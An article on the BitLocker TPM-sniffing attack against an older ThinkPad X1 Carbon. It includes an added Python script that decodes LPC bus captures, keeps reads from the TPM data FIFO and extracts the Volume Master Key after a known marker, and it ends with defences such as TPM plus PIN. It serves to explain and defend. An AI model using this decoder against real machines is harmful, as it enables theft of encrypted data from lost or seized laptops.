BitLocker's encryption is widely trusted, but a recent demonstration showed that an attacker with brief physical access can pull the disk encryption key off a laptop in about 43 seconds using less than $10 of hardware. BitLocker has been a built-in Windows feature since Windows Vista, and Microsoft's position has been that defeating it requires a highly skilled attacker with extended physical access to the machine. That is why this attack got so much attention.
The demonstration came from the security researcher known as Stacksmashing, and the result was staggering. BitLocker is no stranger to Windows users: it runs silently in the background, encrypts the drive, and decrypts data on demand. The crux of the matter is how the key is stored and released. In the default configuration (TPM only, with no PIN), the key that unlocks the volume is sealed to a Trusted Platform Module (TPM). When the computer boots and the firmware measurements match, the TPM releases that key to the CPU, and on many older boards the discrete TPM is attached over the LPC (Low Pin Count) bus, one of the last remnants of the original ISA bus. The key crosses that bus as plain bytes, and that is where the risk to BitLocker's security lies.
The problem is that when the key travels over the LPC bus, it can be sniffed. Some laptops, especially those that bring the LPC signals out to connectors or test points, make this easy. [Stacksmashing] took advantage of the board layout of an older Lenovo ThinkPad X1 Carbon (1st or 2nd generation). Once the back cover is removed, the motherboard exposes an unpopulated connector footprint that Lenovo left in place, and that footprint carries the LPC signals needed to tap the bus. [Stacksmashing] built a small carrier board for a Raspberry Pi Pico; pogo pins on the end of the carrier press against the footprint, so the Pico can capture the bus traffic, decode the TPM's response, and pull the key out of it.
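To make the sniffing step concrete, here is an added example of the decoding side of such an attack. It is not code from the article or from Stacksmashing's tool. It takes a per-clock capture of the LPC LFRAME# and LAD[3:0] signals, decodes the memory read/write cycles using the nibble encoding from the LPC specification (START, cycle type, 8 address nibbles MSB first, turnaround, SYNC, 2 data nibbles LSB first), keeps only the bytes the CPU reads from the TPM data FIFO at 0xFED40024 (the TIS register window), and then searches those bytes for the 12-byte marker that the public BitLocker TPM-sniffing tools look for ahead of the 32-byte Volume Master Key. The bus trace is constructed in the script itself; the real work of sampling the bus at 33 MHz with the Pico's PIO is not shown. Register addresses and the header pattern are as documented for TIS TPMs and the sniffing toolkits; the leading response bytes and the key value are made up for the demo.

```python
# Added example: decode LPC memory cycles from a LAD[3:0] capture and pull the
# BitLocker VMK out of the bytes the CPU reads from the TPM's data FIFO.
# Not stacksmashing's tool; the trace below is constructed, not captured.

TPM_STS_0 = 0xFED40018        # TPM status register, locality 0 (TIS)
TPM_DATA_FIFO_0 = 0xFED40024  # TPM data FIFO, locality 0 (TIS)

# 12-byte marker that precedes the 32-byte VMK in the unseal response; this is
# the pattern the public BitLocker TPM-sniffing tools search for.
VMK_HEADER = bytes.fromhex("2c00000001000000" "03200000")
VMK_LEN = 32

# LPC nibble encodings (Intel LPC Interface Specification 1.1)
START_TARGET = 0b0000
CYC_MEM_READ = 0b0100    # bits 3:2 = 01 (memory), bit 1 = 0 (read)
CYC_MEM_WRITE = 0b0110   # bits 3:2 = 01 (memory), bit 1 = 1 (write)
TAR = 0b1111             # host drives 1111 on the first TAR clock, then floats
SYNC_READY = 0b0000
SYNC_SHORT_WAIT = 0b0101
SYNC_LONG_WAIT = 0b0110


def encode_mem_read(addr, value, wait_clocks=0):
    """Samples (lframe_n, lad) for one LPC memory read cycle, as a logic
    analyser on LFRAME#/LAD[3:0] would see it (used to build the demo trace)."""
    samples = [(0, START_TARGET), (1, CYC_MEM_READ)]
    samples += [(1, (addr >> shift) & 0xF) for shift in range(28, -1, -4)]  # MSB first
    samples += [(1, TAR), (1, TAR)]                  # turnaround to the TPM
    samples += [(1, SYNC_LONG_WAIT)] * wait_clocks   # TPM stalls while it works
    samples += [(1, SYNC_READY)]
    samples += [(1, value & 0xF), (1, (value >> 4) & 0xF)]  # LSB nibble first
    samples += [(1, TAR), (1, TAR)]                  # turnaround back to the host
    return samples


def decode_lpc_memory_cycles(trace):
    """Walk a (lframe_n, lad) sample list and return (op, addr, value) tuples
    for every memory read/write cycle. Other cycle types are skipped."""
    lad = [s[1] for s in trace]
    n = len(lad)
    cycles = []
    i = 0
    while i < n - 1:
        # START is the LAD nibble on the last clock with LFRAME# asserted (low)
        if not (trace[i][0] == 0 and trace[i + 1][0] == 1):
            i += 1
            continue
        if lad[i] != START_TARGET or i + 10 > n:
            i += 1
            continue
        cyc = lad[i + 1]
        if cyc not in (CYC_MEM_READ, CYC_MEM_WRITE):
            i += 1
            continue
        addr = 0
        for nib in lad[i + 2:i + 10]:
            addr = (addr << 4) | nib
        j = i + 10
        if cyc == CYC_MEM_READ:
            j += 2  # TAR
            while j < n and lad[j] in (SYNC_SHORT_WAIT, SYNC_LONG_WAIT):
                j += 1
            if j + 3 > n or lad[j] != SYNC_READY:
                i += 1
                continue  # error/abort SYNC or truncated capture
            value = lad[j + 1] | (lad[j + 2] << 4)
            cycles.append(("read", addr, value))
            j += 3 + 2  # SYNC + data, then final TAR
        else:
            if j + 2 > n:
                break
            value = lad[j] | (lad[j + 1] << 4)
            cycles.append(("write", addr, value))
            j += 2 + 2  # data, then TAR (SYNC and final TAR follow; LFRAME# gating resyncs)
        i = j
    return cycles


def fifo_bytes(cycles):
    """Bytes the host pulled out of the TPM data FIFO, in bus order."""
    return bytes(v for op, addr, v in cycles if op == "read" and addr == TPM_DATA_FIFO_0)


def extract_vmk(stream):
    """Return the 32-byte VMK that follows the header, or None if absent."""
    idx = stream.find(VMK_HEADER)
    if idx < 0 or idx + len(VMK_HEADER) + VMK_LEN > len(stream):
        return None
    start = idx + len(VMK_HEADER)
    return stream[start:start + VMK_LEN]


def build_constructed_trace(vmk):
    """Constructed boot-time traffic: status polls interleaved with the CPU
    draining the unseal response (filler bytes, the header, the key) byte by
    byte from the FIFO. The filler and key bytes are made up."""
    response = bytes.fromhex("80020000") + VMK_HEADER + vmk + bytes.fromhex("0000")
    trace = []
    for k, b in enumerate(response):
        if k % 8 == 0:
            trace += encode_mem_read(TPM_STS_0, 0x90)  # stsValid | dataAvail
        trace += encode_mem_read(TPM_DATA_FIFO_0, b, wait_clocks=k % 3)
    return trace


def demo():
    vmk = bytes(range(0x10, 0x30))  # constructed 32-byte key, not a real VMK
    cycles = decode_lpc_memory_cycles(build_constructed_trace(vmk))
    return extract_vmk(fifo_bytes(cycles))


if __name__ == "__main__":
    print("recovered VMK:", demo().hex())
```

The point of the filter on address is that a boot sees thousands of LPC cycles (status polls, other devices on the bus); only the FIFO reads carry the response, and only the bytes after the marker are the key. With the key in hand the attacker still needs an image of the encrypted volume, which is why the next paragraph matters.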
Of course, it's important to point out that stealing the key alone does not give the attacker the data: they still need the contents of the encrypted drive. That means either taking the whole drive or spending extra time copying it out over USB. The X1 Carbon in question is a ten-year-old laptop, but even it has USB 3.0, which makes that copy reasonably quick. The practical defence against this class of attack is the one Microsoft itself recommends for attackers with physical access: enable pre-boot authentication (TPM plus PIN), so the TPM does not release the key until the user has entered a secret, and the key never crosses the bus on an unattended boot. A firmware TPM integrated into the CPU or chipset also removes the external bus that makes the sniffing possible.